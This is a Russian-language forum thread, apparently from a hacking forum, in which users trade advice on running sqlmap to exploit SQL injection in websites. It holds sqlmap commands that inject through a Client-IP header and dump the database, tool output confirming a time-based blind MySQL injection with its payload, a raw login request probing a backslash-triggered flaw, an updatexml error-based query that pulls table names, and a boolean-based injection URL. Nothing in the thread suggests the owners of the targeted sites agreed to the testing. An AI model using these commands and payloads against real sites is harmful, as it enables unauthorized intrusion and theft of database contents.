Ноооооооооооо Code: sqlmap -u site.ru --headers="Client-IP: -1' OR 3*2*1=6 AND 000358=000358 or 'tPXGszqn'='" --dump --random-agent Так что то пошло Code: [00:41:28] [INFO] (custom) HEADER parameter 'Client-IP #1*' appears to be 'MySQL >= 5.0.12 AND time-based blind' injectable
возможно из за --headers='client-ip:*' отсутствие пробела . Возможно так надо было --headers='client-ip: *', вообще должно было. Но не суть, так или иначе всё робит. раскрутил же
Почти сдвиг есть в хорошую сторону там кажись waf ( Ошибки есть пока что крутит BD Code: [00:41:56] [INFO] checking if the injection point on (custom) HEADER parameter 'Client-IP #1*' is a false positive [00:42:26] [WARNING] there is a possibility that the target (or WAF/IPS/IDS) is dropping 'suspicious' requests (custom) HEADER parameter 'Client-IP #1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] sqlmap identified the following injection point(s) with a total of 97 HTTP(s) requests: --- Parameter: Client-IP #1* ((custom) HEADER) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: -1' OR 3 AND SLEEP(5)-- TZaC21=6 AND 000358=000358 or 'tPXGszqn'=' --- [00:43:36] [INFO] the back-end DBMS is MySQL web application technology: Apache back-end DBMS: MySQL >= 5.0.12 [00:43:36] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries [00:43:36] [INFO] fetching current database [00:43:36] [INFO] retrieved: [00:43:36] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prev nt potential disruptions [00:46:21] [ERROR] invalid character detected. retrying.. there seems to be a continuous problem with connection to the target. Are you sure that you want to continue with further arget testing? [y/N] спасибо тебе, чётко помог.
SQLmap не может спалить дыру Code: POST /dologin HTTP/1.1 Content-Length: 35 Content-Type: application/x-www-form-urlencoded Referer: https://site Cookie: __cfduid=d5b944bc8a46493b7f7457c33594555a21527803716; PHPSESSID=tcbac2uoac16f1rog3anmocn46 Host: site Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Accept: */* email=%5c&password=g00dPa%24%24w0rD я так понимаю всё и за %5c \ с ней тоже дырка появляется если убрать дырка исчезает кто сталкивался ?
Здравствуйте, есть сайт с sqj inject site.com/trata=0 or updatexml(null,concat(0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),null)--. Как мне его скормить эту уязвимость sqlmaпу что б я уже с ней мог в нем работать, вывод таблиц, парсинг информации и тд. Спасибо
Доброго времени суток. Решил пробежать один сайт при помощи sqlmap --crawl. Он нашел один параметр и начал крутить, но неудачно. Spoiler http://site.com/index.php?Itemid=41 +AND+1%3D1+--+&format=feed&id=17&layout=blog&option=com_content&type=atom&view=category Есть ли тут sql?
Спасибо за ответ. Не составит ли вам труда показать пример запроса под этот случай? И как вы определили, что тут присутствует инъекция?
Нет проблем: Он нашел один параметр и начал крутить. Запрос: HTML: http://site.com/index.php?Itemid=41 +AND+1%3D1+--+&format=feed&id=17&layout=blog&option=com_content&type=atom&view=category Это Blind Boolean Based вектор
sqlmap -u 'http://site.com/index.php?Itemid=41&format=feed&id=17&layout=blog&option=com_content&type=atom&view=category' -p Itemid Itemid. Не надо ничего в --data
Может ли SQLMap выдавать ложные payload-ы для инъекций? (Не определяется даже тип БД, хотя SQLMap сказал, что параметр уязвим) Или это WAF мешает?